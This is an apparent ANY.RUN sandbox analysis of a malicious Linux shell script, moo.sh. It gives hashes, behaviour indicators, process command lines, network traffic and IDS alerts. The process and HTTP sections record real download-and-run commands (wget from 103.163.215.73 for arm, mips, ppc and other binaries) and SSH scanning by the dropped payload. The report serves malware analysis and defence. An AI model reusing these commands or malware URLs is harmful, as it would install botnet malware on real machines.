download:

/moo

Full analysis: https://app.any.run/tasks/88eee8fc-9a94-4f56-a65b-d9378438fc01
Verdict: Malicious activity
Analysis date: January 13, 2025, 13:44:55
OS: Ubuntu 22.04.2 LTS
Tags:
scan
ssh
sshscan
telnet
Indicators:
MIME: text/x-shellscript
File info: POSIX shell script, ASCII text executable
MD5:

B5209E5E8DDA8A4A1A7FBCA7F4B744C9

SHA1:

C07AACD3FE9FDEC3001BB95E97BD87FA48188592

SHA256:

606BE47BFE3EC379DC8A898F8FB6DF5D1EF7C0FAE70606DE35E889B3808BC31E

SSDEEP:

48:+SnwUSn1SSnJSnCSnWSnjSnCSnPUSnlSnOSnTSnqAwhA1bAGArAvAkArAPhASAnU:+SwUS1SSJSCSWSjSCSMSlSOSTSqBhObT

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Attempting to scan the network

      • dvrEncoder (PID: 38809)

    • SSHSCAN has been detected (SURICATA)

      • dvrEncoder (PID: 38809)

    • Attempting to connect via SSH

      • dvrEncoder (PID: 38809)

  • SUSPICIOUS

    • Modifies file or directory owner

      • sudo (PID: 38759)

    • Potential Corporate Privacy Violation

      • wget (PID: 38772)
      • wget (PID: 38777)
      • wget (PID: 38766)
      • wget (PID: 38782)
      • wget (PID: 38787)
      • wget (PID: 38797)
      • wget (PID: 38792)
      • wget (PID: 38803)
      • dvrEncoder (PID: 38809)

    • Connects to the server without a host name

      • wget (PID: 38772)
      • wget (PID: 38777)
      • wget (PID: 38787)
      • wget (PID: 38782)
      • wget (PID: 38792)
      • wget (PID: 38797)
      • wget (PID: 38803)

    • Executes the "rm" command to delete files or directories

      • dash (PID: 38763)

    • Uses wget to download content

      • dash (PID: 38763)

    • Gets active TCP connections

      • dash (PID: 38763)

    • Reads /proc/mounts (likely used to find writable filesystems)

      • dvrEncoder (PID: 38806)

    • Reads network configuration

      • dash (PID: 38763)

    • Connects to unusual port

      • dvrEncoder (PID: 38810)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.sh | Linux/UNIX shell script (100)
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
332
Monitored processes
121
Malicious processes
10
Suspicious processes
3

Behavior graph

Click at the process to see the details
start drop and start dash no specs sudo no specs chown no specs chmod no specs sudo no specs dash no specs locale-check no specs rm no specs wget systemctl no specs chmod no specs dash no specs rm no specs wget chmod no specs dash no specs rm no specs wget chmod no specs dash no specs rm no specs wget chmod no specs dash no specs rm no specs wget chmod no specs dash no specs rm no specs wget chmod no specs dash no specs rm no specs wget chmod no specs dash no specs rm no specs wget chmod no specs o no specs dvrencoder no specs dvrencoder no specs dvrencoder no specs #SSHSCAN dvrencoder dvrencoder rm no specs wget chmod no specs dash no specs rm no specs wget chmod no specs dash no specs rm no specs wget chmod no specs dash no specs rm no specs wget no specs chmod no specs dash no specs cp no specs rm no specs busybox chmod no specs dash no specs cp no specs rm no specs busybox chmod no specs dash no specs cp no specs rm no specs busybox chmod no specs dash no specs cp no specs rm no specs busybox chmod no specs dash no specs cp no specs rm no specs busybox chmod no specs dash no specs cp no specs rm no specs busybox chmod no specs dash no specs cp no specs rm no specs busybox chmod no specs dash no specs cp no specs rm no specs busybox chmod no specs dash no specs cp no specs rm no specs busybox chmod no specs dash no specs cp no specs rm no specs busybox chmod no specs dash no specs cp no specs rm no specs busybox chmod no specs dash no specs cp no specs rm no specs busybox chmod no specs dash no specs

Process information

PID
CMD
Path
Indicators
Parent process
38758/bin/sh -c "sudo chown user /tmp/moo\.sh && chmod +x /tmp/moo\.sh && DISPLAY=:0 sudo -iu user /tmp/moo\.sh "/usr/bin/dashany-guest-agent
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38759sudo chown user /tmp/moo.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38760chown user /tmp/moo.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38761chmod +x /tmp/moo.sh/usr/bin/chmoddash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38762sudo -iu user /tmp/moo.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38763/bin/sh /tmp/moo.sh/usr/bin/dashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38764/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkdash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38765rm -rf o/usr/bin/rmdash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38766wget http://103.163.215.73/arm -O-/usr/bin/wget
dash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38767systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service/usr/bin/systemctlsnapd
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Executable files
0
Suspicious files
9
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
38763dash/tmp/obinary
MD5:
SHA256:
38763dash/tmp/o (deleted)binary
MD5:
SHA256:
38837cp/tmp/busyboxbinary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
32 325
DNS requests
16
Threats
130

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
91.189.91.98:80
http://connectivity-check.ubuntu.com/
US
whitelisted
38772
wget
GET
200
103.163.215.73:80
http://103.163.215.73/arm5
VN
binary
89.8 Kb
unknown
38777
wget
GET
200
103.163.215.73:80
http://103.163.215.73/arm6
VN
binary
106 Kb
unknown
38766
wget
GET
200
103.163.215.73:80
http://103.163.215.73/arm
VN
binary
101 Kb
unknown
38787
wget
GET
200
103.163.215.73:80
http://103.163.215.73/mips
VN
binary
131 Kb
unknown
38782
wget
GET
200
103.163.215.73:80
http://103.163.215.73/arm7
VN
binary
119 Kb
unknown
38797
wget
GET
200
103.163.215.73:80
http://103.163.215.73/ppc
VN
binary
97.5 Kb
unknown
38803
wget
GET
200
103.163.215.73:80
http://103.163.215.73/i686
VN
binary
91.9 Kb
unknown
38792
wget
GET
200
103.163.215.73:80
http://103.163.215.73/mpsl
VN
binary
133 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
91.189.91.98:80
connectivity-check.ubuntu.com
Canonical Group Limited
US
whitelisted
212.102.56.178:443
odrs.gnome.org
Datacamp Limited
DE
whitelisted
484
avahi-daemon
224.0.0.251:5353
unknown
512
snapd
185.125.188.59:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
512
snapd
185.125.188.54:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
512
snapd
185.125.188.55:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
512
snapd
185.125.188.58:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
38766
wget
103.163.215.73:80
Lanit Technology and Communication Joint Stock Company
VN
unknown
38772
wget
103.163.215.73:80
Lanit Technology and Communication Joint Stock Company
VN
unknown
38777
wget
103.163.215.73:80
Lanit Technology and Communication Joint Stock Company
VN
unknown

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • 2620:2d:4000:1::97
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::2a
  • 2001:67c:1562::24
  • 2620:2d:4000:1::23
  • 2620:2d:4000:1::96
  • 2620:2d:4002:1::197
  • 2620:2d:4002:1::196
  • 2620:2d:4000:1::22
  • 2001:67c:1562::23
  • 91.189.91.98
  • 185.125.190.17
  • 185.125.190.98
  • 185.125.190.96
  • 91.189.91.49
  • 91.189.91.96
  • 185.125.190.18
  • 91.189.91.48
  • 185.125.190.97
  • 185.125.190.48
  • 91.189.91.97
  • 185.125.190.49
whitelisted
odrs.gnome.org
  • 212.102.56.178
  • 37.19.194.81
  • 169.150.255.180
  • 195.181.170.18
  • 169.150.255.183
  • 195.181.175.41
  • 207.211.211.26
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::107
whitelisted
google.com
  • 216.58.206.78
  • 2a00:1450:4001:80e::200e
whitelisted
api.snapcraft.io
  • 185.125.188.59
  • 185.125.188.55
  • 185.125.188.54
  • 185.125.188.58
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::6d
  • 2620:2d:4000:1010::2e6
whitelisted
46.100.168.192.in-addr.arpa
unknown
ai.stackoverflow.libre
unknown

Threats

PID
Process
Class
Message
38766
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
38772
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
38777
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
38782
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
38787
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
38792
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
38797
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
38803
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
38810
dvrEncoder
Potentially Bad Traffic
ET HUNTING Observed DNS Query for OpenNIC Alternative DNS TLD (.libre)
38809
dvrEncoder
Potential Corporate Privacy Violation
POLICY [ANY.RUN] Attempting to SSH scan external network
No debug info